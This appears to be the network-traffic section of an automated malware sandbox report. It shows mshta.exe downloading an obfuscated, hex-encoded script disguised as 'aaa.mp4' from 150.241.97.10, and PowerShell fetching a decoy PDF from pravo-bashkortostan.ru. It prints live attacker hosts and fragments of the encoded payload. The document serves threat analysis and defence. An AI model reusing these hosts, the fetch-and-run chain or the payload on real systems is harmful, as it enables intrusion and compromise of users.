                                                                      Dec 27, 2024 09:07:03.338764906 CET44349969206.206.125.221192.168.2.7
                                                                      Dec 27, 2024 09:07:03.350300074 CET49970443192.168.2.794.131.118.216
                                                                      Dec 27, 2024 09:07:03.350353003 CET4434997094.131.118.216192.168.2.7
                                                                      Dec 27, 2024 09:07:03.350406885 CET49970443192.168.2.794.131.118.216
                                                                      Dec 27, 2024 09:07:03.422521114 CET49970443192.168.2.794.131.118.216
                                                                      Dec 27, 2024 09:07:03.422545910 CET4434997094.131.118.216192.168.2.7
                                                                      Dec 27, 2024 09:07:03.422590971 CET49970443192.168.2.794.131.118.216
                                                                      Dec 27, 2024 09:07:03.422595978 CET4434997094.131.118.216192.168.2.7
                                                                      Dec 27, 2024 09:07:03.422636032 CET4434997094.131.118.216192.168.2.7
                                                                      Dec 27, 2024 09:07:03.434660912 CET49971443192.168.2.7188.132.183.159
                                                                      Dec 27, 2024 09:07:03.434708118 CET44349971188.132.183.159192.168.2.7
                                                                      Dec 27, 2024 09:07:03.434767008 CET49971443192.168.2.7188.132.183.159
                                                                      Dec 27, 2024 09:07:03.509957075 CET49971443192.168.2.7188.132.183.159
                                                                      Dec 27, 2024 09:07:03.509983063 CET44349971188.132.183.159192.168.2.7
                                                                      Dec 27, 2024 09:07:03.510042906 CET44349971188.132.183.159192.168.2.7
                                                                      Dec 27, 2024 09:07:03.510056973 CET49971443192.168.2.7188.132.183.159
                                                                      Dec 27, 2024 09:07:03.510076046 CET44349971188.132.183.159192.168.2.7
                                                                      Dec 27, 2024 09:07:05.560134888 CET49977443192.168.2.7188.132.183.159
                                                                      Dec 27, 2024 09:07:05.560198069 CET44349977188.132.183.159192.168.2.7
                                                                      Dec 27, 2024 09:07:05.560261011 CET49977443192.168.2.7188.132.183.159
                                                                      Dec 27, 2024 09:07:05.648550034 CET49977443192.168.2.7188.132.183.159
                                                                      Dec 27, 2024 09:07:05.648588896 CET44349977188.132.183.159192.168.2.7
                                                                      Dec 27, 2024 09:07:05.648632050 CET44349977188.132.183.159192.168.2.7
                                                                      Dec 27, 2024 09:07:07.758124113 CET49983443192.168.2.7206.206.125.221
                                                                      Dec 27, 2024 09:07:07.758177042 CET44349983206.206.125.221192.168.2.7
                                                                      Dec 27, 2024 09:07:07.758238077 CET49983443192.168.2.7206.206.125.221
                                                                      Dec 27, 2024 09:07:07.998255968 CET49983443192.168.2.7206.206.125.221
                                                                      Dec 27, 2024 09:07:07.998255968 CET49983443192.168.2.7206.206.125.221
                                                                      Dec 27, 2024 09:07:07.998281002 CET44349983206.206.125.221192.168.2.7
                                                                      Dec 27, 2024 09:07:07.998286963 CET44349983206.206.125.221192.168.2.7
                                                                      Dec 27, 2024 09:07:07.998361111 CET44349983206.206.125.221192.168.2.7
                                                                      Dec 27, 2024 09:07:10.180389881 CET49989443192.168.2.794.131.118.216
                                                                      Dec 27, 2024 09:07:10.180448055 CET4434998994.131.118.216192.168.2.7
                                                                      Dec 27, 2024 09:07:10.180521011 CET49989443192.168.2.794.131.118.216
                                                                      Dec 27, 2024 09:07:10.275348902 CET49989443192.168.2.794.131.118.216
                                                                      Dec 27, 2024 09:07:10.275378942 CET4434998994.131.118.216192.168.2.7
                                                                      Dec 27, 2024 09:07:10.275427103 CET49989443192.168.2.794.131.118.216
                                                                      Dec 27, 2024 09:07:10.275434017 CET4434998994.131.118.216192.168.2.7
                                                                      Dec 27, 2024 09:07:10.275456905 CET4434998994.131.118.216192.168.2.7
                                                                      Dec 27, 2024 09:07:16.944884062 CET50005443192.168.2.7188.132.183.159
                                                                      Dec 27, 2024 09:07:16.944940090 CET44350005188.132.183.159192.168.2.7
                                                                      Dec 27, 2024 09:07:16.945202112 CET50005443192.168.2.7188.132.183.159
                                                                      Dec 27, 2024 09:07:16.999917984 CET50005443192.168.2.7188.132.183.159
                                                                      Dec 27, 2024 09:07:16.999958038 CET44350005188.132.183.159192.168.2.7
                                                                      Dec 27, 2024 09:07:17.000006914 CET50005443192.168.2.7188.132.183.159
                                                                      Dec 27, 2024 09:07:17.000011921 CET44350005188.132.183.159192.168.2.7
                                                                      Dec 27, 2024 09:07:17.000041962 CET44350005188.132.183.159192.168.2.7

                                                                      UDP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Dec 27, 2024 09:05:20.894208908 CET6530053192.168.2.71.1.1.1
                                                                      Dec 27, 2024 09:05:21.165812969 CET53653001.1.1.1192.168.2.7
                                                                      Dec 27, 2024 09:05:37.173464060 CET6513953192.168.2.71.1.1.1
                                                                      Dec 27, 2024 09:05:50.521522999 CET5745153192.168.2.71.1.1.1

                                                                      DNS Queries

                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                      Dec 27, 2024 09:05:20.894208908 CET192.168.2.71.1.1.10x40abStandard query (0)pravo-bashkortostan.ruA (IP address)IN (0x0001)false
                                                                      Dec 27, 2024 09:05:37.173464060 CET192.168.2.71.1.1.10x5b6bStandard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                                      Dec 27, 2024 09:05:50.521522999 CET192.168.2.71.1.1.10x8609Standard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false

                                                                      DNS Answers

                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                      Dec 27, 2024 09:05:21.165812969 CET1.1.1.1192.168.2.70x40abNo error (0)pravo-bashkortostan.ru150.241.97.10A (IP address)IN (0x0001)false
                                                                      Dec 27, 2024 09:05:26.494379044 CET1.1.1.1192.168.2.70x85cbNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                      Dec 27, 2024 09:05:26.494379044 CET1.1.1.1192.168.2.70x85cbNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                      Dec 27, 2024 09:05:37.312712908 CET1.1.1.1192.168.2.70x5b6bNo error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                      Dec 27, 2024 09:05:51.360769033 CET1.1.1.1192.168.2.70x8609No error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                      Dec 27, 2024 09:06:16.557742119 CET1.1.1.1192.168.2.70x87fdNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                      Dec 27, 2024 09:06:16.557742119 CET1.1.1.1192.168.2.70x87fdNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                      Dec 27, 2024 09:06:29.029407978 CET1.1.1.1192.168.2.70x5d5eNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                      Dec 27, 2024 09:06:29.029407978 CET1.1.1.1192.168.2.70x5d5eNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                      Dec 27, 2024 09:06:53.097491980 CET1.1.1.1192.168.2.70x4f1dNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                      Dec 27, 2024 09:06:53.097491980 CET1.1.1.1192.168.2.70x4f1dNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                      Dec 27, 2024 09:07:17.160099030 CET1.1.1.1192.168.2.70x6626No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                      Dec 27, 2024 09:07:17.160099030 CET1.1.1.1192.168.2.70x6626No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false

                                                                      HTTP Request Dependency Graph

                                                                      • 150.241.97.10
                                                                      • pravo-bashkortostan.ru

                                                                      HTTPS Proxied Packets

                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      0192.168.2.749699150.241.97.104436404C:\Windows\System32\mshta.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-12-27 08:05:12 UTC324OUTGET /aaa.mp4 HTTP/1.1
                                                                      Accept: */*
                                                                      Accept-Language: en-CH
                                                                      UA-CPU: AMD64
                                                                      Accept-Encoding: gzip, deflate
                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                      Host: 150.241.97.10
                                                                      Connection: Keep-Alive
                                                                      2024-12-27 08:05:13 UTC253INHTTP/1.1 200 OK
                                                                      Date: Fri, 27 Dec 2024 08:05:13 GMT
                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                      Last-Modified: Tue, 24 Dec 2024 02:55:06 GMT
                                                                      ETag: "796cb-629fb3d863680"
                                                                      Accept-Ranges: bytes
                                                                      Content-Length: 497355
                                                                      Connection: close
                                                                      Content-Type: video/mp4
                                                                      2024-12-27 08:05:13 UTC7939INData Raw: 36 36 54 37 35 65 36 65 46 36 33 62 37 34 42 36 39 41 36 66 67 36 65 55 32 30 61 36 39 4c 36 38 66 37 31 45 34 63 56 36 65 62 32 38 47 37 36 70 37 31 52 37 33 4d 35 35 70 34 33 63 32 39 72 37 62 7a 37 36 69 36 31 51 37 32 44 32 30 56 35 30 61 34 65 54 37 32 4e 36 35 4b 36 66 54 37 39 6c 33 64 44 32 30 68 32 37 74 32 37 4e 33 62 5a 36 36 4d 36 66 78 37 32 6c 32 30 79 32 38 76 37 36 63 36 31 50 37 32 50 32 30 6d 36 63 58 36 35 73 35 31 76 34 33 66 36 31 46 32 30 4b 33 64 6b 32 30 48 33 30 71 33 62 55 36 63 76 36 35 70 35 31 58 34 33 66 36 31 5a 32 30 4d 33 63 48 32 30 50 37 36 72 37 31 74 37 33 41 35 35 6e 34 33 68 32 65 74 36 63 50 36 35 45 36 65 4f 36 37 45 37 34 65 36 38 76 33 62 57 32 30 54 36 63 41 36 35 51 35 31 79 34 33 68 36 31 59 32 62 68 32 62 46
                                                                      Data Ascii: 66T75e6eF63b74B69A6fg6eU20a69L68f71E4cV6eb28G76p71R73M55p43c29r7bz76i61Q72D20V50a4eT72N65K6fT79l3dD20h27t27N3bZ66M6fx72l20y28v76c61P72P20m6cX65s51v43f61F20K3dk20H30q3bU6cv65p51X43f61Z20M3cH20P76r71t73A55n43h2et6cP65E6eO67E74e68v3bW20T6cA65Q51y43h61Y2bh2bF
                                                                      2024-12-27 08:05:13 UTC8000INData Raw: 37 46 33 36 41 32 63 61 33 39 6c 33 37 78 33 31 73 32 63 76 33 39 5a 33 38 67 33 39 61 32 63 70 33 39 6b 33 38 66 33 38 64 32 63 7a 33 39 56 33 37 4d 33 32 63 32 63 48 33 39 6e 33 38 46 33 38 6a 32 63 58 33 39 6d 33 37 45 33 31 59 32 63 52 33 39 42 33 39 76 33 31 62 32 63 51 33 39 4c 33 38 4c 33 38 48 32 63 42 33 39 6f 33 37 46 33 36 47 32 63 46 33 39 5a 33 38 56 33 36 4b 32 63 68 33 39 4b 33 38 64 33 39 44 32 63 67 33 39 51 33 38 65 33 38 53 32 63 63 33 39 69 33 37 45 33 38 75 32 63 70 33 39 57 33 39 63 33 31 6f 32 63 68 33 39 59 33 39 62 33 30 74 32 63 64 33 39 45 33 36 4b 33 39 64 32 63 5a 33 39 59 33 37 62 33 34 4b 32 63 51 33 39 47 33 36 58 33 39 69 32 63 53 33 39 76 33 37 43 33 36 4e 32 63 49 33 39 41 33 37 72 33 38 42 32 63 58 33 39 63 33 37 7a 33
                                                                      Data Ascii: 7F36A2ca39l37x31s2cv39Z38g39a2cp39k38f38d2cz39V37M32c2cH39n38F38j2cX39m37E31Y2cR39B39v31b2cQ39L38L38H2cB39o37F36G2cF39Z38V36K2ch39K38d39D2cg39Q38e38S2cc39i37E38u2cp39W39c31o2ch39Y39b30t2cd39E36K39d2cZ39Y37b34K2cQ39G36X39i2cS39v37C36N2cI39A37r38B2cX39c37z3
                                                                      2024-12-27 08:05:13 UTC8000INData Raw: 33 39 61 33 39 74 33 30 57 32 63 6e 33 39 58 33 38 7a 33 37 52 32 63 4c 33 39 63 33 37 6b 33 38 44 32 63 59 33 39 56 33 37 6b 33 33 59 32 63 4b 33 39 4e 33 38 4b 33 39 4b 32 63 6a 33 39 43 33 37 48 33 37 45 32 63 79 33 39 58 33 36 66 33 39 69 32 63 4f 33 39 58 33 37 46 33 37 75 32 63 42 33 39 49 33 37 53 33 34 72 32 63 54 33 39 62 33 38 76 33 36 53 32 63 42 33 39 67 33 37 77 33 36 52 32 63 58 33 39 4e 33 37 56 33 37 6d 32 63 71 33 39 66 33 36 6a 33 39 73 32 63 58 33 39 75 33 38 68 33 38 6b 32 63 53 33 39 70 33 39 59 33 31 51 32 63 73 33 39 51 33 39 43 33 31 6e 32 63 58 33 39 71 33 37 42 33 38 51 32 63 43 33 39 73 33 37 45 33 35 69 32 63 52 33 39 72 33 37 4a 33 38 44 32 63 46 33 39 71 33 37 67 33 34 6b 32 63 42 33 39 73 33 37 72 33 30 6a 32 63 6f 33 39 4e
                                                                      Data Ascii: 39a39t30W2cn39X38z37R2cL39c37k38D2cY39V37k33Y2cK39N38K39K2cj39C37H37E2cy39X36f39i2cO39X37F37u2cB39I37S34r2cT39b38v36S2cB39g37w36R2cX39N37V37m2cq39f36j39s2cX39u38h38k2cS39p39Y31Q2cs39Q39C31n2cX39q37B38Q2cC39s37E35i2cR39r37J38D2cF39q37g34k2cB39s37r30j2co39N
                                                                      2024-12-27 08:05:13 UTC8000INData Raw: 66 32 63 68 33 39 6f 33 37 66 33 31 58 32 63 76 33 39 44 33 39 6a 33 30 68 32 63 54 33 39 48 33 37 45 33 31 6d 32 63 49 33 39 68 33 37 50 33 30 4b 32 63 68 33 39 76 33 37 7a 33 38 4c 32 63 70 33 39 4f 33 37 55 33 38 6f 32 63 66 33 39 46 33 37 6e 33 31 44 32 63 69 33 39 56 33 37 54 33 38 54 32 63 45 33 39 61 33 37 50 33 35 59 32 63 61 33 39 65 33 37 65 33 37 4c 32 63 6a 33 39 50 33 39 4b 33 31 4b 32 63 63 33 39 54 33 38 4a 33 36 48 32 63 48 33 39 78 33 38 59 33 36 66 32 63 4f 33 39 73 33 37 71 33 37 54 32 63 55 33 39 72 33 37 72 33 35 70 32 63 50 33 39 66 33 37 79 33 36 79 32 63 6f 33 39 6b 33 37 68 33 37 69 32 63 52 33 39 72 33 37 6a 33 36 44 32 63 52 33 39 6f 33 36 63 33 39 61 32 63 45 33 39 4b 33 37 4c 33 38 4c 32 63 77 33 39 67 33 37 77 33 34 6c 32 63
                                                                      Data Ascii: f2ch39o37f31X2cv39D39j30h2cT39H37E31m2cI39h37P30K2ch39v37z38L2cp39O37U38o2cf39F37n31D2ci39V37T38T2cE39a37P35Y2ca39e37e37L2cj39P39K31K2cc39T38J36H2cH39x38Y36f2cO39s37q37T2cU39r37r35p2cP39f37y36y2co39k37h37i2cR39r37j36D2cR39o36c39a2cE39K37L38L2cw39g37w34l2c
                                                                      2024-12-27 08:05:13 UTC8000INData Raw: 37 5a 33 33 49 32 63 49 33 39 6d 33 37 52 33 30 65 32 63 73 33 39 4e 33 37 62 33 32 4b 32 63 4d 33 39 62 33 38 50 33 36 41 32 63 6d 33 39 6b 33 37 66 33 33 6e 32 63 4a 33 39 46 33 37 75 33 34 66 32 63 4e 33 39 6e 33 37 58 33 38 73 32 63 77 33 39 78 33 37 69 33 30 6b 32 63 5a 33 39 67 33 38 65 33 38 48 32 63 4d 33 39 49 33 39 70 33 31 70 32 63 56 33 39 70 33 38 5a 33 39 52 32 63 6e 33 39 46 33 37 51 33 33 50 32 63 46 33 39 5a 33 39 67 33 30 58 32 63 43 33 39 49 33 37 61 33 32 61 32 63 43 33 39 74 33 38 75 33 37 56 32 63 4f 33 39 59 33 36 68 33 39 76 32 63 65 33 39 71 33 37 6c 33 31 66 32 63 77 33 39 48 33 37 6f 33 38 64 32 63 76 33 39 71 33 39 52 33 31 54 32 63 67 33 39 63 33 37 73 33 34 49 32 63 57 33 39 49 33 37 6e 33 35 58 32 63 52 33 39 4b 33 37 69 33
                                                                      Data Ascii: 7Z33I2cI39m37R30e2cs39N37b32K2cM39b38P36A2cm39k37f33n2cJ39F37u34f2cN39n37X38s2cw39x37i30k2cZ39g38e38H2cM39I39p31p2cV39p38Z39R2cn39F37Q33P2cF39Z39g30X2cC39I37a32a2cC39t38u37V2cO39Y36h39v2ce39q37l31f2cw39H37o38d2cv39q39R31T2cg39c37s34I2cW39I37n35X2cR39K37i3
                                                                      2024-12-27 08:05:13 UTC8000INData Raw: 33 39 66 33 37 72 33 34 62 32 63 5a 33 39 42 33 39 4a 33 31 75 32 63 56 33 39 69 33 39 54 33 31 76 32 63 53 33 39 46 33 38 4f 33 39 49 32 63 45 33 39 47 33 37 6a 33 38 4d 32 63 7a 33 39 62 33 37 4f 33 34 6b 32 63 53 33 39 51 33 37 6f 33 33 4f 32 63 78 33 39 6b 33 37 4e 33 38 43 32 63 54 33 39 69 33 39 75 33 31 48 32 63 49 33 39 54 33 37 5a 33 34 53 32 63 64 33 39 4e 33 37 6f 33 30 66 32 63 4a 33 39 46 33 38 4d 33 38 52 32 63 73 33 39 4e 33 37 62 33 37 4b 32 63 62 33 39 79 33 37 67 33 36 6d 32 63 52 33 39 48 33 36 4a 33 39 49 32 63 4e 33 39 75 33 37 78 33 34 6b 32 63 56 33 39 51 33 37 62 33 32 6a 32 63 4c 33 39 48 33 37 7a 33 30 6b 32 63 68 33 39 51 33 38 6a 33 37 6d 32 63 6d 33 39 6a 33 39 61 33 31 4d 32 63 44 33 39 57 33 38 56 33 36 6a 32 63 4a 33 39 43
                                                                      Data Ascii: 39f37r34b2cZ39B39J31u2cV39i39T31v2cS39F38O39I2cE39G37j38M2cz39b37O34k2cS39Q37o33O2cx39k37N38C2cT39i39u31H2cI39T37Z34S2cd39N37o30f2cJ39F38M38R2cs39N37b37K2cb39y37g36m2cR39H36J39I2cN39u37x34k2cV39Q37b32j2cL39H37z30k2ch39Q38j37m2cm39j39a31M2cD39W38V36j2cJ39C
                                                                      2024-12-27 08:05:13 UTC8000INData Raw: 4c 33 35 45 32 63 71 33 31 49 33 30 79 33 31 53 33 32 61 32 63 6f 33 31 4e 33 30 63 33 31 70 33 34 64 32 63 70 33 31 53 33 30 6a 33 31 72 33 34 68 32 63 74 33 39 72 33 36 64 33 31 57 32 63 41 33 39 4d 33 36 6c 33 31 78 32 63 57 33 31 4f 33 30 52 33 31 47 33 32 64 32 63 4c 33 31 74 33 30 52 33 30 4e 33 34 66 32 63 79 33 31 63 33 30 73 33 32 44 33 32 6d 32 63 67 33 31 63 33 30 6d 33 32 67 33 30 68 32 63 4f 33 31 74 33 30 4c 33 33 76 33 38 4e 32 63 42 33 31 4e 33 30 49 33 33 51 33 35 6b 32 63 4b 33 31 72 33 30 46 33 32 4c 33 36 62 32 63 45 33 31 49 33 30 68 33 33 6a 33 37 52 32 63 76 33 31 4d 33 30 62 33 34 6d 33 32 6c 32 63 4f 33 39 6f 33 36 71 33 37 46 32 63 78 33 39 74 33 38 4f 33 38 67 32 63 44 33 31 69 33 30 63 33 33 43 33 35 57 32 63 74 33 31 62 33 30
                                                                      Data Ascii: L35E2cq31I30y31S32a2co31N30c31p34d2cp31S30j31r34h2ct39r36d31W2cA39M36l31x2cW31O30R31G32d2cL31t30R30N34f2cy31c30s32D32m2cg31c30m32g30h2cO31t30L33v38N2cB31N30I33Q35k2cK31r30F32L36b2cE31I30h33j37R2cv31M30b34m32l2cO39o36q37F2cx39t38O38g2cD31i30c33C35W2ct31b30
                                                                      2024-12-27 08:05:13 UTC8000INData Raw: 97 f5 01 33 f7 6a 01 34 62 ba 01 34 c4 ac 01 35 17 48 01 35 65 00 01 35 b1 ec 01 35 ff be 01 36 39 6a 01 36 6f 53 01 36 ab 3b 01 36 d6 cb 01 37 1a 12 01 37 9b e5 01 37 fb 88 01 38 6d 52 01 38 ea bc 01 39 6a c5 01 39 d9 f4 01 3a 4a f4 01 3a a2 9f 01 3b 08 54 01 3b 79 c9 01 3b ee 63 01 3c 63 84 01 3c d9 23 01 3d 4b ec 01 3d c1 a0 01 3e 3a 12 01 3e bd 4d 01 3f 1d 7a 01 3f 5b ad 01 3f bd 44 01 40 03 39 01 40 50 8f 01 40 a7 e0 01 41 13 b3 01 41 85 43 01 41 f4 ed 01 42 6c 7f 01 42 f7 9f 01 43 e4 2f 01 44 f2 dd 01 45 f5 39 01 46 f0 ac 01 47 e8 55 01 48 d9 5a 01 49 b0 d7 01 4a 55 16 01 4b 24 d2 01 4b fb 86 01 4c cb aa 01 4d a2 61 01 4e 73 e0 01 4f 34 89 01 4f d5 74 01 50 5b 46 01 50 cd 6f 01 51 34 64 01 51 8e 4e 01 52 1f fb 01 52 9b e5 01 53 2b 22 01 53 bd b7 01
                                                                      Data Ascii: 3j4b45H5e5569j6oS6;67778mR89j9:J:;T;y;c<c<#=K=>:>M?z?[?D@9@P@AACABlBC/DE9FGUHZIJUK$KLMaNsO4OtP[FPoQ4dQNRRS+"S
                                                                      2024-12-27 08:05:13 UTC8000INData Raw: 05 7d a0 12 05 7e 80 73 05 7f 6c e8 05 80 47 4b 05 81 24 d5 05 81 ed 55 05 82 93 56 05 83 3f 33 05 83 e3 4f 05 84 75 fd 05 84 e2 bb 05 85 3e c1 05 85 96 3a 05 85 c6 a8 05 86 47 f9 05 86 fd 2e 05 87 86 29 05 88 64 17 05 89 4a e0 05 8a 2e bd 05 8b 00 9d 05 8b be 48 05 8c 6e 31 05 8d 24 1a 05 8d eb ad 05 8e 5d b7 05 8e af 00 05 8f 01 49 05 8f 64 cf 05 90 05 d0 05 91 11 d3 05 91 b6 10 05 92 65 75 05 93 18 e2 05 93 bd 07 05 94 5d d9 05 94 fc 7e 05 95 98 fd 05 96 32 01 05 96 bf 03 05 97 6b 4c 05 98 0f 5e 05 98 96 ae 05 99 77 4a 05 99 fe f6 05 9a 61 a3 05 9a ae 33 05 9a ee 15 05 9b 25 df 05 9b 4f 2a 05 9b 8c 4d 05 9b ae 1d 05 9b d5 d8 05 9c 09 fb 05 9c 65 eb 05 9c e3 78 05 9d a1 38 05 9e 0d e9 05 9e ab 80 05 a0 15 f1 05 a1 be e2 05 a2 fe 6f 05 a4 09 63 05 a4 bc
                                                                      Data Ascii: }~slGK$UV?3Ou>:G.)dJ.Hn1$]Ideu]~2kL^wJa3%O*Mex8oc
                                                                      2024-12-27 08:05:13 UTC8000INData Raw: 00 00 07 05 00 00 08 ac 00 00 08 a5 00 00 09 21 00 00 08 0d 00 00 08 88 00 00 08 ab 00 00 08 50 00 00 09 24 00 00 08 ca 00 00 09 98 00 00 09 f0 00 00 09 5b 00 00 09 99 00 00 09 1b 00 00 09 7f 00 00 09 5f 00 00 09 3b 00 00 0a 46 00 00 0a 90 00 00 0a 11 00 00 0a 8c 00 00 0a 67 00 00 09 43 00 00 09 51 00 00 09 85 00 00 09 36 00 00 09 51 00 00 09 ad 00 00 10 b5 00 00 0c 66 00 00 0b 1c 00 00 0b 7a 00 00 0a fd 00 00 0a a5 00 00 0a aa 00 00 0a e6 00 00 0a 79 00 00 0a 9e 00 00 0a 43 00 00 0a 73 00 00 0b 03 00 00 0b 93 00 00 0a 9f 00 00 0b 65 00 00 0a ac 00 00 0a 7e 00 00 0a 8b 00 00 0a a2 00 00 0a 74 00 00 0a 2d 00 00 0a 90 00 00 09 94 00 00 09 b1 00 00 11 ff 00 00 09 8d 00 00 09 30 00 00 09 99 00 00 09 35 00 00 09 bd 00 00 09 2e 00 00 09 e0 00 00 0a f1 00 00 0a
                                                                      Data Ascii: !P$[_;FgCQ6QfzyCse~t-05.


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      1192.168.2.749719150.241.97.104437432C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-12-27 08:05:22 UTC79OUTGET /ggg.pdf HTTP/1.1
                                                                      Host: pravo-bashkortostan.ru
                                                                      Connection: Keep-Alive
                                                                      2024-12-27 08:05:23 UTC261INHTTP/1.1 200 OK
                                                                      Date: Fri, 27 Dec 2024 08:05:23 GMT
                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                      Last-Modified: Tue, 24 Dec 2024 02:51:24 GMT
                                                                      ETag: "1491ab-629fb304ac300"
                                                                      Accept-Ranges: bytes
                                                                      Content-Length: 1348011
                                                                      Connection: close
                                                                      Content-Type: application/pdf
                                                                      2024-12-27 08:05:23 UTC7931INData Raw: 25 50 44 46 2d 31 2e 34 0a 25 d3 f4 cc e1 0a 31 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 43 72 65 61 74 69 6f 6e 44 61 74 65 28 44 3a 32 30 32 34 30 32 32 32 31 33 30 33 35 33 2b 30 35 27 30 30 27 29 0a 2f 43 72 65 61 74 6f 72 28 50 44 46 73 68 61 72 70 20 31 2e 35 31 2e 35 31 38 35 20 5c 28 77 77 77 2e 70 64 66 73 68 61 72 70 2e 63 6f 6d 5c 29 29 0a 2f 50 72 6f 64 75 63 65 72 28 50 44 46 73 68 61 72 70 20 31 2e 35 31 2e 35 31 38 35 20 5c 28 77 77 77 2e 70 64 66 73 68 61 72 70 2e 63 6f 6d 5c 29 29 0a 3e 3e 0a 65 6e 64 6f 62 6a 0a 32 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 54 79 70 65 2f 43 61 74 61 6c 6f 67 0a 2f 50 61 67 65 73 20 33 20 30 20 52 0a 2f 4d 65 74 61 64 61 74 61 20 32 33 20 30 20 52 0a 3e 3e 0a 65 6e 64 6f 62 6a 0a 33 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 54 79
                                                                      Data Ascii: %PDF-1.4%1 0 obj<</CreationDate(D:20240222130353+05'00')/Creator(PDFsharp 1.51.5185 \(www.pdfsharp.com\))/Producer(PDFsharp 1.51.5185 \(www.pdfsharp.com\))>>endobj2 0 obj<</Type/Catalog/Pages 3 0 R/Metadata 23 0 R>>endobj3 0 obj<</Ty
                                                                      2024-12-27 08:05:23 UTC8000INData Raw: 79 de 3d 9b 49 7d 9f 27 7c 0e b4 97 10 c6 da b0 48 c8 46 39 53 81 fe cd 00 4b e4 c8 f3 49 6e 26 6f 29 a3 c1 c9 24 93 81 df f1 ac 96 91 20 75 11 12 8c 40 1b 88 e9 eb fd 6b 48 ab 5b 5d ec 5b 91 81 19 26 47 fe 13 d0 ff 00 21 59 e6 1b 66 66 12 4b f3 a1 0f bb 3c 30 cf 26 80 2d c2 63 b4 d5 4b 02 66 6f 2f 27 e5 1c f7 c8 a2 ee f6 39 2e 21 99 c3 2a 49 17 2b 8c e7 0d d2 92 32 93 dd 3c 50 5c 05 0f 18 02 40 a0 71 fe 73 4e bc 10 c5 7d 66 a1 95 a2 45 0b 9e bd c5 00 42 f7 91 6c 0b e4 92 ea 06 e5 23 04 01 9f f1 a6 cd e7 cd 31 8e 38 ca 46 7b 13 ce 40 04 d6 9e ac 63 84 ac ae 36 a3 a9 42 c0 67 19 c6 0d 57 4b a8 a5 9c b3 1f 2f 12 2b 21 61 8d c0 0c 13 f9 50 05 78 6c c2 b7 df 2a f1 0c ab e7 f8 4f 46 c7 f3 a9 6e 25 f2 61 f3 11 11 dc 36 19 3a 83 9e 32 0f a1 a0 5c 23 c2 1a 48 58
                                                                      Data Ascii: y=I}'|HF9SKIn&o)$ u@kH[][&G!YffK<0&-cKfo/'9.!*I+2<P\@qsN}fEBl#18F{@c6BgWK/+!aPxl*OFn%a6:2\#HX
                                                                      2024-12-27 08:05:23 UTC8000INData Raw: b7 dc 35 35 43 6a 7e 43 53 50 03 24 fb f1 ff 00 bd fd 0d 2c 9f ea cf d2 9b 2f df 8b fd ef e8 69 d2 7d c6 fa 50 04 09 fe b1 7f cf 6a b3 55 93 fd 62 ff 00 9e d5 66 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 c8 a2 80 0a 29 32 33 8c 8c fa 52 d0 01 45 19 a4 56 57 19 56 04 7a 83 40 0b 45 46 27 89 9b 6a c8 85 bd 01 e6 84 b8 85 db 6a 4a 8c de 80 d0 04 94 55 5d 42 76 86 dc f9 72 a4 72 f5 5d e7 ad 54 fe d0 9d 9e 1d e1 2d d0 f2 cc ec 0e e1 ed 40 1a b4 52 2b 06 50 ca 72 0f 20 d2 d0 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 06 66 a1 77 07 da 92 de 79 02 46 b8
                                                                      Data Ascii: 55Cj~CSP$,/i}PjUbf(((()23REVWVz@EF'jjJU]Bvrr]T-@R+Pr EPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPfwyF
